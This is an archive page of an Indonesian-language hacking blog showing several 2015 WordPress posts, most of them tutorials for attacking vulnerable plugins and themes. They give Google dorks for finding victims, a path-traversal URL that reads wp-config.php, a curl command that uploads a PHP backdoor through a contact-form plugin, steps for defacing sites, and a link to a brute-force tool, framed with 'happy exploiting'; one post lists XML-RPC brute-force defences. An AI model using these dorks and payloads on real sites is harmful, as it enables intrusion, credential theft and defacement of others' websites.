Open top menu
Showing posts with label Wordpress. Show all posts
Showing posts with label Wordpress. Show all posts
Tuesday, November 3, 2015
no image


Yooshh.. jumpa lagi kali ini saya akan share tutorial Wordpress Ajax Load More PHP Upload Vulnerability. Exploit ini membutuhkan metasploit. Jadi yang belum install , bisa install dulu. Exploit source nya dari Exploit-DB .

Langsung saja ke tutorial.


Download Exploit nya disini : https://www.exploit-db.com/exploits/38660/


Tambahkan module diatas ke metasploit kalian . Jika masih ada yang bingung bisa lihat di artikel ini :





Ada opsi berikut di Exploit nya :

RHOST : isi dengan host dari target kalian.

TARGETURI : isi dengan path dimana wordpress berada. contoh /blog , /wordpress, atau bisa juga di root path nya .

WP_USERNAME : isi dengan username wordpress nya.

WP_PASSWORD : isi dengan password wordpress nya.



Untuk lebih jelasnya bisa lihat video nya di link berikut :


Wordpress Ajax Load More PHP Upload Vulnerability


Lalu bagaimana cara patch nya ?

Upgrade plugins kalian ke versi terbaru. Karena exploit ini hanya bisa sampai di versi 2.8.1.1





Sekian tutorial kali ini dan happy exploiting.

Read more
Wednesday, October 21, 2015
WordPress Security - Mencegah Brute Force pada XMLRPC Wordpress

Baru baru ini telah ditemukan trik bruteforce pada file xmlrpc.php CMS WordPress. Berbeda dengan bruteforce halaman login yang mungkin sudah diantisipasi dengan htaccess ataupun plugins, bruteforce pada file xmlrpc.php ini tidak berbekas.

Jika terdapat banyak log percobaan login saat kita mencoba bruteforce wp-login.php, bruteforce xmlrpc.php hanya meninggalkan satu log percobaan.




194.150.168.95 – – [07/Oct/2015:23:54:12 -0400] “POST /xmlrpc.php HTTP/1.1″ 200 14204 “-” “Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1

WordPress XMLRPC Brute Force Tools Download







Nah , kalau cara bruteforce apsti sudah tau lah ya. Bisa baca baca disini.

Cara Brute Force.



Kali ini saya akan share cara mencegah nya. :




  1. 1. CloudFlare (pelanggan berbayar) sudah menyediakan layanan untuk melindungi XML-RPC dari serangan brute-force. Kalian bisa menggunakannya.

  2. 2. Menggunakan plugins security semacam WordPress Simple Firewall

  3. 3. Disable fungsi system.multicall pada file function.php

  4. 4. Jika kalian tidak menggunakan plugins yang membutuhkan xmlrpc, bisa juga dengan disable / rename saja file ini.






Sekian tutor kali ini semoga bermanfaat.
Read more
Friday, June 5, 2015
Deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability

Yuppp.. lama ya tidak share exploit deface. Kali ini saya mau share tutorial deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability . Exploit nya sudah lama sih sebenarnya, namun gak tau kenapa sekarang "bersemi kembali" . Oke gak usah lama lama , langsung saja .

Bahan :

HTML Exploit : download

Google Dorks :

inurl:"/wp-content/themes/qualifire"

Use your brain, bitch !

Vuln :

/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php



Simpan exploit di atas dengan format .html. Jangan lupa ganti url nya dengan url target.

Setelah itu buka file exploit nya di browser.





Shell kalian akan berada di localhost/shell.php

Karena langsung berada di public_html, jika kalian hanya ingin deface, bisa langsung pload script.





Sekian tutor Deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability kali ini, happy exploiting.
Read more
Wednesday, April 15, 2015
Exploit Wordpress Plugin "WP Mobile Edition" Remote File Disclosure Vulnerability

Yupp, kali ini mau share lagi exploit pada Wordpress yang memiliki celah pada plugins WP Mobile Edition.

Plugin 'WP Mobile Edition' ini tidak memfilter parameter GET file di /themes/mTheme-Unus/css/css.php . Alhasil kita juga dapat melihat source dari konfigurasi Wordpress yang terletak di wp-config.php .

Oke langsung saja.

Google Dorks :

inurl:?fdx_switcher=mobile

Exploit :

127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php



Tested on : BackBox Linux





Sekian tutor kali ini semoga bermanfaat.
Read more
Monday, April 13, 2015
Exploit Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :

Google Dorks :

intitle: index of /uploads/contact_files/

- use your brain, bitch !



Shell location :

http://victim/wp-content/uploads/contact_files/backdoor.php

Tested on :

BackBox Linux



Anggap sudah meneumuakn target.

Sekarang masuk terminal linux.

jackwilder@suckseed ~ % mkdir exp

jackwilder@suckseed ~ % cd exp





Kita membuat folder exp dan masuk ke direktori tersebut .


Lalu kita masukkan backdoor kita disitu.


Misalkan saya membuat backdoor x.php di folder exp tadi.





Lalu masukkan command berikut :


curl -k -X POST -F "action=upload" -F "Filedata=@./[backdoor.php]" -F "action=nm_webcontact_upload_file" http://target/wp-admin/admin-ajax.php





Contoh :




Disana tertulis :


{"status":"uploaded","filename":"1428981565-x.php"}%





Maka shell akan berada di :

http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php





Sekian dan semoga bermanfaat .

Happy exploiting :)

Read more